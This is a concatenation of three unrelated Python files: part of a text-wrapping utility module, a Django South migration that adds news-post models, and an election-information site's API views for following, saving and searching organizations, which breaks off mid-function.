# Hello/ /there/ /--/ /you/ /goof-ball,/ /use/ /the/ /-b/ /option!/
wordsep_simple_re = re.compile(r'(\s+)')
# XXX this is not locale- or charset-aware -- string.lowercase
# is US-ASCII only (and therefore English-only)
sentence_end_re = re.compile(r'[a-z]' # lowercase letter
r'[\.\!\?]' # sentence-ending punct.
r'[\"\']?' # optional end-of-quote
r'\Z') # end of chunk
def __init__(self,
width=70,
initial_indent="",
subsequent_indent="",
expand_tabs=True,
replace_whitespace=True,
fix_sentence_endings=False,
break_long_words=True,
drop_whitespace=True,
break_on_hyphens=True):
self.width = width
self.initial_indent = initial_indent
self.subsequent_indent = subsequent_indent
self.expand_tabs = expand_tabs
self.replace_whitespace = replace_whitespace
self.fix_sentence_endings = fix_sentence_endings
self.break_long_words = break_long_words
self.drop_whitespace = drop_whitespace
self.break_on_hyphens = break_on_hyphens
# -- Private methods -----------------------------------------------
# (possibly useful for subclasses to override)
def _munge_whitespace(self, text):
"""_munge_whitespace(text : string) -> string
Munge whitespace in text: expand tabs and convert all other
whitespace characters to spaces. Eg. " foo\tbar\n\nbaz"
becomes " foo bar baz".
"""
if self.expand_tabs:
text = text.expandtabs()
if self.replace_whitespace:
text = text.translate(self.unicode_whitespace_trans)
return text
def _split(self, text):
"""_split(text : string) -> [string]
Split the text to wrap into indivisible chunks. Chunks are
not quite the same as words; see _wrap_chunks() for full
details. As an example, the text
Look, goof-ball -- use the -b option!
breaks into the following chunks:
'Look,', ' ', 'goof-', 'ball', ' ', '--', ' ',
'use', ' ', 'the', ' ', '-b', ' ', 'option!'
if break_on_hyphens is True, or in:
'Look,', ' ', 'goof-ball', ' ', '--', ' ',
'use', ' ', 'the', ' ', '-b', ' ', option!'
otherwise.
"""
if self.break_on_hyphens is True:
chunks = self.wordsep_re.split(text)
else:
chunks = self.wordsep_simple_re.split(text)
chunks = [c for c in chunks if c]
return chunks
def _fix_sentence_endings(self, chunks):
"""_fix_sentence_endings(chunks : [string])
Correct for sentence endings buried in 'chunks'. Eg. when the
original text contains "... foo.\nBar ...", munge_whitespace()
and split() will convert that to [..., "foo.", " ", "Bar", ...]
which has one too few spaces; this method simply changes the one
space to two.
"""
i = 0
patsearch = self.sentence_end_re.search
while i < len(chunks)-1:
if chunks[i+1] == " " and patsearch(chunks[i]):
chunks[i+1] = " "
i += 2
else:
i += 1
def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
"""_handle_long_word(chunks : [string],
cur_line : [string],
cur_len : int, width : int)
Handle a chunk of text (most likely a word, not whitespace) that
is too long to fit in any line.
"""
# Figure out when indent is larger than the specified width, and make
# sure at least one character is stripped off on every pass
if width < 1:
space_left = 1
else:
space_left = width - cur_len
# If we're allowed to break long words, then do so: put as much
# of the next chunk onto the current line as will fit.
if self.break_long_words:
cur_line.append(reversed_chunks[-1][:space_left])
reversed_chunks[-1] = reversed_chunks[-1][space_left:]
# Otherwise, we have to preserve the long word intact. Only add
# it to the current line if there's nothing already there --
# that minimizes how much we violate the width constraint.
elif not cur_line:
cur_line.append(reversed_chunks.pop())
# If we're not allowed to break long words, and there's already
# text on the current line, do nothing. Next time through the
# main loop of _wrap_chunks(), we'll wind up here again, but
# cur_len will be zero, so the next line will be entirely
# devoted to the long word that we can't handle right now.
def _wrap_chunks(self, chunks):
"""_wrap_chunks(chunks : [string]) -> [string]
Wrap a sequence of text chunks and return a list of lines of
length 'self.width' or less. (If 'break_long_words' is false,
some lines may be longer than this.) Chunks correspond roughly
to words and the whitespace between them: each chunk is
indivisible (modulo 'break_long_words'), but a line break can
come between any two chunks. Chunks should not have internal
whitespace; ie. a chunk is either all whitespace or a "word".
Whitespace chunks will be removed from the beginning and end of
lines, but apart from that whitespace is preserved.
"""
lines = []
if self.width <= 0:
raise ValueError("invalid width %r (must be > 0)" % self.width)
# Arrange in reverse order so items can be efficiently popped
# from a stack of chucks.
chunks.reverse()
while chunks:
# Start the list of chunks that will make up the current line.
# cur_len is just the length of all the chunks in cur_line.
cur_line = []
cur_len = 0
# Figure out which static string will prefix this line.
if lines:
indent = self.subsequent_indent
else:
indent = self.initial_indent
# Maximum width for this line.
width = self.width - len(indent)
# First chunk on line is whitespace -- drop it, unless this
# is the very beginning of the text (ie. no lines started yet).
if self.drop_whitespace and chunks[-1].strip() == '' and lines:
del chunks[-1]
while chunks:
l = len(chunks[-1])
# Can at least squeeze this chunk onto the current line.
if cur_len + l <= width:
cur_line.append(chunks.pop())
cur_len += l
# Nope, this line is full.
else:
break
# The current line is full, and the next chunk is too big to
# fit on *any* line (not just this one).
if chunks and len(chunks[-1]) > width:
self._handle_long_word(chunks, cur_line, cur_len, width)
# If the last chunk on this line is all whitespace, drop it.
if self.drop_whitespace and cur_line and cur_line[-1].strip() == '':
del cur_line[-1]
# Convert current line back to a string and store it in list
# of all lines (return value).
if cur_line:
lines.append(indent + ''.join(cur_line))
return lines
# -- Public interface ----------------------------------------------
def wrap(self, text):
"""wrap(text : string) -> [string]
Reformat the single paragraph in 'text' so it fits in lines of
no more than 'self.width' columns, and return a list of wrapped
lines. Tabs in 'text' are expanded with string.expandtabs(),
and all other whitespace characters (including newline) are
converted to space.
"""
text = self._munge_whitespace(text)
chunks = self._split(text)
if self.fix_sentence_endings:
self._fix_sentence_endings(chunks)
return self._wrap_chunks(chunks)
def fill(self, text):
"""fill(text : string) -> string
Reformat the single paragraph in 'text' to fit in lines of no
more than 'self.width' columns, and return a new string
containing the entire wrapped paragraph.
"""
return "\n".join(self.wrap(text))
# -- Convenience interface ---------------------------------------------
def wrap(text, width=70, **kwargs):
"""Wrap a single paragraph of text, returning a list of wrapped lines.
Reformat the single paragraph in 'text' so it fits in lines of no
more than 'width' columns, and return a list of wrapped lines. By
default, tabs in 'text' are expanded with string.expandtabs(), and
all other whitespace characters (including newline) are converted to
space. See TextWrapper class for available keyword args to customize
wrapping behaviour.
"""
w = TextWrapper(width=width, **kwargs)
return w.wrap(text)
def fill(text, width=70, **kwargs):
"""Fill a single paragraph of text, returning a new string.
Reformat the single paragraph in 'text' to fit in lines of no more
than 'width' columns, and return a new string containing the entire
wrapped paragraph. As with wrap(), tabs are expanded and other
whitespace characters converted to space. See TextWrapper class for
available keyword args to customize wrapping behaviour.
"""
w = TextWrapper(width=width, **kwargs)
return w.fill(text)
# -- Loosely related functionality -------------------------------------
_whitespace_only_re = re.compile('^[ \t]+$', re.MULTILINE)
_leading_whitespace_re = re.compile('(^[ \t]*)(?:[^ \t\n])', re.MULTILINE)
def dedent(text):
"""Remove any common leading whitespace from every line in `text`.
This can be used to make triple-quoted strings line up with the left
edge of the display, while still presenting them in the source code
in indented form.
Note that tabs and spaces are both treated as whitespace, but they
are not equal: the lines " hello" and "\thello" are
considered to have no common leading whitespace. (This behaviour is
new in Python 2.5; older versions of this module incorrectly
expanded tabs before searching for common leading whitespace.)
"""
# Look for the longest leading string of spaces and tabs common to
# all lines.
margin = None
text = _whitespace_only_re.sub('', text)
indents = _leading_whitespace_re.findall(text)
for indent in indents:
if margin is None:
margin = indent
# Current line more deeply indented than previous winner:
# no change (previous winner is still on top).
elif indent.startswith(margin):
pass
# Current line consistent with and no deeper than previous winner:
# it's the new winner.
elif margin.startswith(indent):
margin = indent
# Current line and previous winner have no common whitespace:
# there is no margin.
else:
margin = ""
break
# sanity check (testing/debugging only)
if 0 and margin:
for line in text.split("\n"):
assert not line or line.startswith(margin), \
"line = %r, margin = %r" % (line, margin)
if margin:
text = re.sub(r'(?m)^' + margin, '', text)
return text
if __name__ == "__main__":
#print dedent("\tfoo\n\tbar")
#print dedent(" \thello there\n \t how are you?")
print(dedent("Hello there.\n This is indented."))
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'DummyTable'
db.create_table(u'news_dummytable', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal(u'news', ['DummyTable'])
# Adding model 'NewsPost'
db.create_table(u'news_newspost', (
(u'bccfchildpage_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['bccf.BCCFChildPage'], unique=True, primary_key=True)),
))
db.send_create_signal(u'news', ['NewsPost'])
def backwards(self, orm):
# Deleting model 'DummyTable'
db.delete_table(u'news_dummytable')
# Deleting model 'NewsPost'
db.delete_table(u'news_newspost')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'bccf.bccfchildpage': {
'Meta': {'ordering': "('titles',)", 'object_name': 'BCCFChildPage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bccf_topic': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['bccf.BCCFTopic']", 'null': 'True', 'blank': 'True'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gparent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFPage']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'in_menus': ('mezzanine.pages.fields.MenusField', [], {'default': '(1, 2, 3)', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'page_for': ('django.db.models.fields.CharField', [], {'default': "'Parents'", 'max_length': '13', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFChildPage']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'rating': ('mezzanine.generic.fields.RatingField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.Rating']", 'frozen_by_south': 'True'}),
'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_sum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.bccfpage': {
'Meta': {'ordering': "('_order',)", 'object_name': 'BCCFPage', '_ormbases': [u'pages.Page']},
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
u'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
u'bccf.bccftopic': {
'Meta': {'object_name': 'BCCFTopic'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.pagemarquee': {
'Meta': {'object_name': 'PageMarquee'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'generic.assignedkeyword': {
'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'},
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': u"orm['generic.Keyword']"}),
'object_pk': ('django.db.models.fields.IntegerField', [], {})
},
u'generic.keyword': {
'Meta': {'object_name': 'Keyword'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
u'generic.rating': {
'Meta': {'object_name': 'Rating'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_pk': ('django.db.models.fields.IntegerField', [], {}),
'rating_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ratings'", 'null': 'True', 'to': u"orm['auth.User']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
},
u'news.dummytable': {
'Meta': {'object_name': 'DummyTable'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'news.newspost': {
'Meta': {'ordering': "('_order',)", 'object_name': 'NewsPost', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'})
},
u'pages.page': {
'Meta': {'ordering': "('titles',)", 'object_name': 'Page'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_menus': ('mezzanine.pages.fields.MenusField', [], {'default': '(1, 2, 3)', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': u"orm['generic.AssignedKeyword']", 'frozen_by_south': 'True'}),
'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': u"orm['pages.Page']"}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['news']
|
|
# apis_v1/views/views_organization.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from follow.models import UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW, UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW, \
UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW_ON_TWITTER, UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS, \
UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS_ON_TWITTER, UPDATE_SUGGESTIONS_ALL, \
FOLLOW_SUGGESTIONS_FROM_FRIENDS_ON_TWITTER, FOLLOW_SUGGESTIONS_FROM_FRIENDS, \
FOLLOW_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW
from apis_v1.controllers import organization_count, organization_follow, organization_follow_ignore, \
organization_stop_following
from config.base import get_environment_variable
from django.http import HttpResponse
from django_user_agents.utils import get_user_agent
from follow.controllers import organization_suggestion_tasks_for_api
import json
from organization.controllers import organization_retrieve_for_api, organization_save_for_api, \
organization_search_for_api, organizations_followed_retrieve_for_api
from organization.models import UNKNOWN
from voter.models import voter_has_authority, VoterManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, get_voter_device_id, \
get_maximum_number_to_retrieve_from_request, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL")
def organization_count_view(request):
return organization_count()
def organization_follow_api_view(request): # organizationFollow
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
organization_twitter_handle = request.GET.get('organization_twitter_handle', '')
organization_follow_based_on_issue = request.GET.get('organization_follow_based_on_issue', False)
organization_follow_based_on_issue = positive_value_exists(organization_follow_based_on_issue)
user_agent_string = request.META['HTTP_USER_AGENT']
user_agent_object = get_user_agent(request)
return organization_follow(voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
organization_twitter_handle=organization_twitter_handle,
organization_follow_based_on_issue=organization_follow_based_on_issue,
user_agent_string=user_agent_string, user_agent_object=user_agent_object)
def organization_stop_following_api_view(request): # organizationStopFollowing
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
user_agent_string = request.META['HTTP_USER_AGENT']
user_agent_object = get_user_agent(request)
return organization_stop_following(voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
user_agent_string=user_agent_string, user_agent_object=user_agent_object)
def organization_follow_ignore_api_view(request): # organizationFollowIgnore
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
user_agent_string = request.META['HTTP_USER_AGENT']
user_agent_object = get_user_agent(request)
return organization_follow_ignore(voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
user_agent_string=user_agent_string, user_agent_object=user_agent_object)
def organization_retrieve_view(request):
"""
Retrieve a single organization based on unique identifier
:param request:
:return:
"""
organization_id = request.GET.get('organization_id', 0)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
return organization_retrieve_for_api(
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
voter_device_id=voter_device_id,
)
def organization_save_view(request): # organizationSave
"""
Save a single organization based on unique identifier
:param request:
:return:
"""
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
organization_email = request.GET.get('organization_email', False)
organization_description = request.GET.get('organization_description', False)
organization_facebook = request.GET.get('organization_facebook', False)
organization_id = request.GET.get('organization_id', 0)
organization_image = request.GET.get('organization_image', False)
organization_instagram_handle = request.GET.get('organization_instagram_handle', False)
organization_name = request.GET.get('organization_name', False)
organization_type = request.GET.get('organization_type', False)
organization_we_vote_id = request.GET.get('organization_we_vote_id', '')
organization_website = request.GET.get('organization_website', False)
# We only want to allow save if either this is your organization (i.e., you have the Twitter handle)
organization_linked_to_this_voter = False
voter_owns_twitter_handle = False
voter_owns_facebook_id = False
# Twitter specific
organization_twitter_handle = request.GET.get('organization_twitter_handle', False)
refresh_from_twitter = request.GET.get('refresh_from_twitter', False)
# Facebook specific
facebook_id = request.GET.get('facebook_id', False)
if facebook_id is not False:
facebook_id = convert_to_int(facebook_id)
facebook_email = request.GET.get('facebook_email', False)
facebook_profile_image_url_https = request.GET.get('facebook_profile_image_url_https', False)
# admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer
authority_required = {'admin', 'political_data_manager', 'verified_volunteer'}
voter_has_authority_required = False
if voter_has_authority(request, authority_required):
voter_has_authority_required = True
else:
voter_manager = VoterManager()
voter_results = voter_manager.retrieve_voter_from_voter_device_id(voter_device_id)
if voter_results['voter_found']:
voter = voter_results['voter']
# Is this voter linked to this organization?
if positive_value_exists(voter.linked_organization_we_vote_id) \
and positive_value_exists(organization_we_vote_id) \
and voter.linked_organization_we_vote_id == organization_we_vote_id:
organization_linked_to_this_voter = True
# Does this voter have the same Facebook id as this organization? If so, link this organization to
# this particular voter
voter_facebook_id = voter_manager.fetch_facebook_id_from_voter_we_vote_id(voter.we_vote_id)
if positive_value_exists(voter_facebook_id) \
and positive_value_exists(facebook_id) \
and voter_facebook_id == facebook_id:
voter_owns_facebook_id = True
# Does this voter have the same Twitter handle as this organization? If so, link this organization to
# this particular voter
voter_twitter_handle = voter_manager.fetch_twitter_handle_from_voter_we_vote_id(voter.we_vote_id)
if positive_value_exists(voter_twitter_handle) \
and positive_value_exists(organization_twitter_handle) \
and voter_twitter_handle.lower() == organization_twitter_handle.lower():
voter_owns_twitter_handle = True
if not voter_has_authority_required:
if not voter_owns_twitter_handle and not voter_owns_facebook_id and not organization_linked_to_this_voter:
# Only refuse entry if *both* conditions are not met
results = {
'status': "VOTER_LACKS_AUTHORITY_TO_SAVE_ORGANIZATION",
'success': False,
'facebook_id': facebook_id,
'facebook_email': facebook_email,
'facebook_profile_image_url_https': facebook_profile_image_url_https,
'new_organization_created': False,
'organization_description': organization_description,
'organization_email': organization_email,
'organization_facebook': organization_facebook,
'organization_id': organization_id,
'organization_instagram_handle': organization_instagram_handle,
'organization_name': organization_name,
'organization_photo_url': organization_image,
'organization_twitter_handle': organization_twitter_handle,
'organization_type': organization_type,
'organization_we_vote_id': organization_we_vote_id,
'organization_website': organization_website,
'refresh_from_twitter': refresh_from_twitter,
'twitter_followers_count': 0,
'twitter_description': "",
}
return HttpResponse(json.dumps(results), content_type='application/json')
results = organization_save_for_api(
voter_device_id=voter_device_id, organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
organization_name=organization_name, organization_description=organization_description,
organization_email=organization_email,
organization_website=organization_website, organization_twitter_handle=organization_twitter_handle,
organization_facebook=organization_facebook, organization_instagram_handle=organization_instagram_handle,
organization_image=organization_image,
organization_type=organization_type, refresh_from_twitter=refresh_from_twitter,
facebook_id=facebook_id, facebook_email=facebook_email,
facebook_profile_image_url_https=facebook_profile_image_url_https,
)
return HttpResponse(json.dumps(results), content_type='application/json')
def organization_search_view(request): # organizationSearch
"""
Search for organizations based on a few search terms
:param request:
:return:
"""
organization_search_term = request.GET.get('organization_search_term', '')
organization_name = request.GET.get('organization_name', '')
organization_twitter_handle = request.GET.get('organization_twitter_handle', '')
organization_website = request.GET.get('organization_website', '')
organization_email = request.GET.get('organization_email', '')
exact_match = positive_value_exists(request.GET.get('exact_match', False))
return organization_search_for_api(organization_search_term=organization_search_term,
organization_name=organization_name,
organization_twitter_handle=organization_twitter_handle,
organization_website=organization_website,
organization_email=organization_email,
exact_match=exact_match)
def organization_suggestion_tasks_view(request):
"""
This will provide list of suggested organizations to follow.
These suggestions are generated from twitter ids i follow, or organization of my friends follow.
:param request:
:return:
"""
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
kind_of_suggestion_task = request.GET.get('kind_of_suggestion_task',
UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW)
kind_of_follow_task = request.GET.get('kind_of_follow_task', '')
if kind_of_suggestion_task not in (UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIENDS_FOLLOW_ON_TWITTER,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS,
UPDATE_SUGGESTIONS_FROM_WHAT_FRIEND_FOLLOWS_ON_TWITTER,
